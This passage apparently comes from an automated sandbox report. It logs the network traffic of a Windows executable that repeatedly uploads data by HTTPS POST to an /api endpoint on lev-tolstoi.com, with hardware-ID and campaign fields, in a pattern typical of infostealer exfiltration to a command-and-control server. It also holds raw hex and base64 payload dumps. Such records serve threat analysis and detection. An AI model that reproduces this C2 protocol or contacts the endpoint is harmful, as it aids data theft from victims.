                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 55 58 41 74 79 75 54 74 6f 78 49 64 64 75 31 68 64 6c 6e 61 63 55 75 64 56 52 6c 43 58 55 49 54 59 33 59 31 53 62 55 76 76 53 4e 74 63 42 6a 72 78 61 57 44 52 78 41 76 31 66 56 75 4e 66 5a 59 51 33 31 4e 4d 56 5a 74 46 79 63 4f 42 6e 68 4a 69 51 71 34 61 6b 52 46 4a 63 76 42 6a 4c 34 53 48 4e 4f 78 35 48 4c 64 32 6d 42 37 56 51 41 68 42 33 6c 2b 45 77 4a 2f 55 53 69 70 4b 70 78 57 65 58 67 59 34 2b 58 35 6c 30 4d 38 4c 2b 47 42 52 68 6e 57 61 47 4e 68 62 52 6c 71 59 54 38 2f 4d 6c 5a 51 54 59 41 66 68 55 4a 78 4a 52 32 71 33 54 32 6a 51 79 67 71 35 52 31 32 4d 65 35 45 47 6b 6b 6b 47 52 39 42 42 79 49 66 4c 31 42 35 6a 52 36 51 61 6e 31 45 41 50 2f 4a 34 61 4e 2f 4b 41 76 46 38 57 59 5a 35 6e 78 33 55 56 6b 39 61 6c 56 54 42 7a 70 2b 59 55 69 51 48 71 41
                                                                                                                                                                                                                                              Data Ascii: UXAtyuTtoxIddu1hdlnacUudVRlCXUITY3Y1SbUvvSNtcBjrxaWDRxAv1fVuNfZYQ31NMVZtFycOBnhJiQq4akRFJcvBjL4SHNOx5HLd2mB7VQAhB3l+EwJ/USipKpxWeXgY4+X5l0M8L+GBRhnWaGNhbRlqYT8/MlZQTYAfhUJxJR2q3T2jQygq5R12Me5EGkkkGR9BByIfL1B5jR6Qan1EAP/J4aN/KAvF8WYZ5nx3UVk9alVTBzp+YUiQHqA
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 63 76 42 33 4c 34 53 48 44 50 4a 67 55 49 78 38 6d 78 62 61 55 55 5a 54 6d 30 44 50 77 4a 53 53 48 32 4a 4b 71 68 4f 61 56 51 30 67 39 48 42 6c 30 63 31 46 74 54 4a 5a 6d 6a 58 4f 55 50 56 61 59 55 36 4c 56 4e 4b 48 6a 4e 6f 4c 4b 6b 43 6a 55 4d 4d 52 42 44 33 2b 64 47 66 55 79 41 72 2f 66 46 69 45 65 4a 4d 66 32 45 52 41 55 4a 31 4e 79 38 79 42 6c 42 39 75 53 36 73 59 6b 46 74 48 66 4c 64 38 64 35 79 66 52 63 35 2f 55 59 4a 32 67 46 44 4e 47 46 45 65 6c 30 71 45 6e 39 4f 59 48 47 70 49 6f 78 79 51 57 51 59 2b 2b 58 78 71 31 63 38 4e 36 58 4e 61 69 6e 53 59 48 39 4e 53 54 56 75 55 51 63 44 42 6e 4e 52 63 4b 6b 43 33 55 4d 4d 52 4b 42 58 43 4f 55 37 6d 68 78 71 31 61 78 36 46 65 64 5a 49 6b 6c 70 4c 55 70 68 4a 77 73 36 66 6e 68 74 68 53 36 51 55 6c 31 67
                                                                                                                                                                                                                                              Data Ascii: cvB3L4SHDPJgUIx8mxbaUUZTm0DPwJSSH2JKqhOaVQ0g9HBl0c1FtTJZmjXOUPVaYU6LVNKHjNoLKkCjUMMRBD3+dGfUyAr/fFiEeJMf2ERAUJ1Ny8yBlB9uS6sYkFtHfLd8d5yfRc5/UYJ2gFDNGFEel0qEn9OYHGpIoxyQWQY++Xxq1c8N6XNainSYH9NSTVuUQcDBnNRcKkC3UMMRKBXCOU7mhxq1ax6FedZIklpLUphJws6fnhthS6QUl1g
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 6d 37 61 31 51 4c 79 59 46 43 50 65 70 34 59 32 31 64 4d 57 35 31 41 79 4d 32 53 6b 78 78 6b 54 2b 39 65 32 31 59 66 63 71 38 37 54 73 7a 63 46 2b 31 2f 66 34 39 36 31 67 2b 63 54 77 68 5a 6e 41 61 63 68 35 71 47 46 6d 64 56 70 68 65 56 58 67 51 67 39 6e 5a 6b 7a 73 41 4b 2f 33 56 53 68 48 71 51 45 64 64 63 52 46 6d 56 54 63 76 4c 30 39 70 53 62 56 2f 76 53 4e 74 2f 44 43 48 67 65 47 48 58 30 52 36 37 62 52 43 62 4e 5a 45 63 6b 67 34 49 58 5a 74 4e 77 4d 65 66 6c 42 5a 6e 52 37 30 66 6e 46 59 4f 4f 65 56 78 61 4e 76 4d 44 66 42 39 57 4a 42 35 6d 41 4c 58 52 46 6f 65 33 67 62 44 33 39 50 4d 55 6c 78 41 76 77 43 59 45 7a 59 6b 39 47 31 6b 30 63 74 46 35 44 78 48 77 6e 4b 61 55 49 6f 57 54 6c 47 5a 52 63 76 47 6d 70 67 66 62 30 36 71 45 5a 31 56 44 54 6a 33
                                                                                                                                                                                                                                              Data Ascii: m7a1QLyYFCPep4Y21dMW51AyM2SkxxkT+9e21Yfcq87TszcF+1/f4961g+cTwhZnAach5qGFmdVpheVXgQg9nZkzsAK/3VShHqQEddcRFmVTcvL09pSbV/vSNt/DCHgeGHX0R67bRCbNZEckg4IXZtNwMeflBZnR70fnFYOOeVxaNvMDfB9WJB5mALXRFoe3gbD39PMUlxAvwCYEzYk9G1k0ctF5DxHwnKaUIoWTlGZRcvGmpgfb06qEZ1VDTj3
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 68 4c 34 6a 4a 5a 6a 6a 58 4f 55 4e 46 52 53 31 2b 61 54 38 6a 49 6c 4a 41 41 59 45 43 39 45 5a 70 61 43 6a 37 33 64 6d 4c 57 78 67 7a 32 66 6c 4f 46 63 70 6b 56 6b 68 67 49 57 59 67 47 6e 49 65 79 6d 52 6c 6d 48 50 56 51 68 42 38 65 63 76 42 33 4c 34 53 48 42 66 46 33 56 49 39 32 6d 52 50 41 56 30 35 4d 6b 45 76 4f 31 5a 6d 66 46 32 64 4b 6f 68 4f 64 56 77 77 2b 35 58 4a 76 33 38 78 46 74 54 4a 5a 6d 6a 58 4f 55 50 46 42 58 6c 53 58 53 74 4c 4d 6b 70 63 45 5a 31 66 76 58 74 74 41 41 43 4f 33 49 33 6e 4d 30 41 4c 6b 50 45 66 43 63 70 70 51 69 68 5a 4f 56 35 5a 42 77 73 6d 42 6b 52 52 6c 53 4b 59 5a 6e 31 6b 45 4d 76 4e 2f 61 4e 6e 45 43 66 42 31 58 59 31 78 6e 78 37 62 57 51 67 51 30 45 48 63 68 38 76 55 4d 33 46 45 6f 78 33 62 54 6b 6b 72 74 33 78 6a 6e
                                                                                                                                                                                                                                              Data Ascii: hL4jJZjjXOUNFRS1+aT8jIlJAAYEC9EZpaCj73dmLWxgz2flOFcpkVkhgIWYgGnIeymRlmHPVQhB8ecvB3L4SHBfF3VI92mRPAV05MkEvO1ZmfF2dKohOdVww+5XJv38xFtTJZmjXOUPFBXlSXStLMkpcEZ1fvXttAACO3I3nM0ALkPEfCcppQihZOV5ZBwsmBkRRlSKYZn1kEMvN/aNnECfB1XY1xnx7bWQgQ0EHch8vUM3FEox3bTkkrt3xjn
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 71 48 71 4a 2b 67 42 58 56 51 41 70 72 6b 30 6a 4b 77 49 58 55 44 56 55 4a 37 78 2b 42 45 56 38 4c 37 6a 74 6f 30 49 64 64 75 32 64 5a 67 6e 4b 4d 42 74 56 61 57 56 57 64 53 75 62 49 6c 49 49 52 5a 55 53 2b 47 64 64 61 43 6e 4b 35 4f 32 6a 45 68 31 32 37 58 56 6d 55 64 72 6b 54 77 31 38 49 45 4e 42 42 30 6f 66 4c 31 43 77 71 56 61 77 41 6d 46 34 57 44 4c 63 6a 64 75 4b 48 44 75 31 31 54 6f 46 6a 6e 52 33 65 52 33 59 65 79 42 4b 57 6c 63 48 47 51 48 55 48 73 43 2f 56 45 51 5a 79 72 30 4a 32 6e 4e 46 46 6f 79 41 51 77 6d 66 57 53 4a 49 52 53 30 79 43 51 4d 66 52 6b 4e 4d 73 56 47 43 35 47 70 78 42 41 43 58 34 4f 79 47 63 79 45 57 6a 53 78 36 4c 63 6f 30 42 78 46 74 59 57 64 42 35 69 6f 65 4c 31 45 6f 71 63 71 77 65 6c 56 59 52 49 37 70 63 65 64 62 41 46 66
                                                                                                                                                                                                                                              Data Ascii: qHqJ+gBXVQAprk0jKwIXUDVUJ7x+BEV8L7jto0Iddu2dZgnKMBtVaWVWdSubIlIIRZUS+GddaCnK5O2jEh127XVmUdrkTw18IENBB0ofL1CwqVawAmF4WDLcjduKHDu11ToFjnR3eR3YeyBKWlcHGQHUHsC/VEQZyr0J2nNFFoyAQwmfWSJIRS0yCQMfRkNMsVGC5GpxBACX4OyGcyEWjSx6Lco0BxFtYWdB5ioeL1EoqcqwelVYRI7pcedbAFf
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 65 74 6f 65 32 56 5a 50 54 6f 5a 64 69 4d 2b 51 6a 67 68 55 65 59 51 63 6e 56 59 64 4e 66 46 64 54 35 79 4a 52 66 51 79 42 72 73 31 33 6c 44 74 47 41 68 47 30 42 36 45 38 70 43 61 48 47 31 52 76 6c 32 7a 63 6a 30 49 74 56 64 6f 79 59 55 78 2f 47 4a 50 69 58 69 61 55 4a 77 57 54 68 37 49 46 6f 71 48 6c 34 56 53 4d 68 66 39 53 38 34 43 55 47 4b 6c 5a 43 48 46 68 78 4f 37 4b 67 7a 4d 4e 59 52 51 69 68 59 50 58 59 4a 55 77 73 53 46 6c 31 56 55 65 59 67 65 6e 46 41 52 49 75 42 30 55 65 4c 53 42 76 56 38 57 5a 52 6b 31 6c 36 53 57 51 67 47 71 51 61 4d 68 36 7a 61 55 6e 49 48 39 31 43 75 55 67 6b 38 38 47 31 2b 6b 65 41 4c 2f 48 4e 49 6b 6d 4b 5a 55 4a 77 57 54 68 37 49 46 49 71 48 6c 34 56 53 4d 68 66 39 53 38 34 43 55 47 4b 6c 5a 43 48 46 68 78 4f 37 4b 67 7a
                                                                                                                                                                                                                                              Data Ascii: etoe2VZPToZdiM+QjghUeYQcnVYdNfFdT5yJRfQyBrs13lDtGAhG0B6E8pCaHG1Rvl2zcj0ItVdoyYUx/GJPiXiaUJwWTh7IFoqHl4VSMhf9S84CUGKlZCHFhxO7KgzMNYRQihYPXYJUwsSFl1VUeYgenFARIuB0UeLSBvV8WZRk1l6SWQgGqQaMh6zaUnIH91CuUgk88G1+keAL/HNIkmKZUJwWTh7IFIqHl4VSMhf9S84CUGKlZCHFhxO7Kgz
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 35 42 32 54 30 69 54 42 6f 71 48 6e 39 52 4b 4b 6b 61 6c 41 4a 5a 65 41 48 37 77 59 57 69 63 69 55 58 31 4d 67 62 43 64 4a 77 41 33 31 6c 50 45 70 5a 49 79 6f 65 4d 32 67 73 71 55 65 39 49 79 42 39 48 49 4c 63 6a 4c 35 76 45 46 2b 6c 30 58 5a 52 32 30 53 37 73 65 31 70 5a 67 45 57 47 39 70 36 51 42 48 39 45 76 78 65 6c 62 79 6f 67 38 47 74 73 6e 76 59 54 2b 48 4a 51 68 54 58 59 55 4d 6f 57 45 42 36 39 56 4d 50 58 6b 4e 52 63 4b 6b 76 76 53 4e 74 63 46 54 58 6e 65 43 50 62 33 51 4b 37 62 52 43 62 4e 59 42 51 69 67 55 47 48 6f 49 47 6e 49 66 55 6d 68 39 72 52 4b 45 54 69 55 4d 42 4d 65 46 34 4b 4f 4c 35 4b 4f 6c 31 54 6f 45 33 70 78 33 57 51 46 31 64 67 45 48 36 2b 62 36 47 46 58 70 45 37 54 79 63 58 41 73 4d 79 55 78 2b 32 39 64 48 33 58 46 49 67 54 58 59
                                                                                                                                                                                                                                              Data Ascii: 5B2T0iTBoqHn9RKKkalAJZeAH7wYWiciUX1MgbCdJwA31lPEpZIyoeM2gsqUe9IyB9HILcjL5vEF+l0XZR20S7se1pZgEWG9p6QBH9Evxelbyog8GtsnvYT+HJQhTXYUMoWEB69VMPXkNRcKkvvSNtcFTXneCPb3QK7bRCbNYBQigUGHoIGnIfUmh9rRKETiUMBMeF4KOL5KOl1ToE3px3WQF1dgEH6+b6GFXpE7TycXAsMyUx+29dH3XFIgTXY


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.549707104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:34 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DXFUN3R3CE
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 12787
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:34 UTC12787OUTData Raw: 2d 2d 44 58 46 55 4e 33 52 33 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 58 46 55 4e 33 52 33 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 58 46 55 4e 33 52 33 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 44 58 46 55 4e 33 52 33 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                              Data Ascii: --DXFUN3R3CEContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--DXFUN3R3CEContent-Disposition: form-data; name="pid"2--DXFUN3R3CEContent-Disposition: form-data; name="lid"PsFKDg--pablo--DXFUN3R3CEContent-
                                                                                                                                                                                                                                              2024-12-28 08:56:35 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:35 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=uhlfrt1trsig4jv1b0e5kd6pmu; expires=Wed, 23 Apr 2025 02:43:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NmDrDkmb9P8RdXtnkLgbiUTantteQrD9iOKylIQ35zUVbO0a5FLaMx%2BI9oCyLjZzgSY2P2MvTAH%2Bc4ei%2BWWY%2Fn6NBb35OhjaTdPZ3E9UevQIt0UOxgcWpIpE0uAEfXhmlyM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f905682cd140cbc-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1443&rtt_var=560&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13718&delivery_rate=1923583&cwnd=175&unsent_bytes=0&cid=da4eca5edc7fb8c1&ts=930&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-28 08:56:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.549709104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:37 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=TYYEVX5PB
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 15023
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:37 UTC15023OUTData Raw: 2d 2d 54 59 59 45 56 58 35 50 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 59 59 45 56 58 35 50 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 59 59 45 56 58 35 50 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 59 59 45 56 58 35 50 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                              Data Ascii: --TYYEVX5PBContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--TYYEVX5PBContent-Disposition: form-data; name="pid"2--TYYEVX5PBContent-Disposition: form-data; name="lid"PsFKDg--pablo--TYYEVX5PBContent-Disp
                                                                                                                                                                                                                                              2024-12-28 08:56:37 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:37 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4esbtdrr4mla59iebvh3eo9jvk; expires=Wed, 23 Apr 2025 02:43:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dq2xScp0YP4cB5VysIbJska8FVlzOJpz994UEHK%2FvcU3%2FlgwwVBVk9QLEnhfP3Vym%2FmNVmnIVXACg3FfEAOp4ZERaNSOI8nnpBtJK94sjcp1Iz4ahSjcHaO9fGOUzlBtLPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056913c31335a-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1796&rtt_var=683&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15953&delivery_rate=1592148&cwnd=232&unsent_bytes=0&cid=fafd0b94630e5963&ts=837&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-28 08:56:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.549710104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:39 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=RLS0B21M9
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 20513
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:39 UTC15331OUTData Raw: 2d 2d 52 4c 53 30 42 32 31 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 52 4c 53 30 42 32 31 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 4c 53 30 42 32 31 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 4c 53 30 42 32 31 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                              Data Ascii: --RLS0B21M9Content-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--RLS0B21M9Content-Disposition: form-data; name="pid"3--RLS0B21M9Content-Disposition: form-data; name="lid"PsFKDg--pablo--RLS0B21M9Content-Disp
                                                                                                                                                                                                                                              2024-12-28 08:56:39 UTC5182OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
                                                                                                                                                                                                                                              Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                                                                                                                                              2024-12-28 08:56:40 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:40 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=k2nprtuvukf4hc1cbjc988m23r; expires=Wed, 23 Apr 2025 02:43:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hZdizQ8FOEqbggLcWNp8gTfdrCy9MFOE9i1njc9x4a9hqJQIqy0URxqr%2FzHekyHQzcVaxRR2Q248399PyedgahexxBTKU99nBVKX%2Bi3KDRJEPy5NKlUVTQZCw8IQkohtOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f90569ff95eefa7-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1743&rtt_var=673&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21465&delivery_rate=1602634&cwnd=161&unsent_bytes=0&cid=e16228afaa8447c5&ts=1022&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-28 08:56:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.549719104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:42 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DXSZON86U9QPW6QDNT
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 1269
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
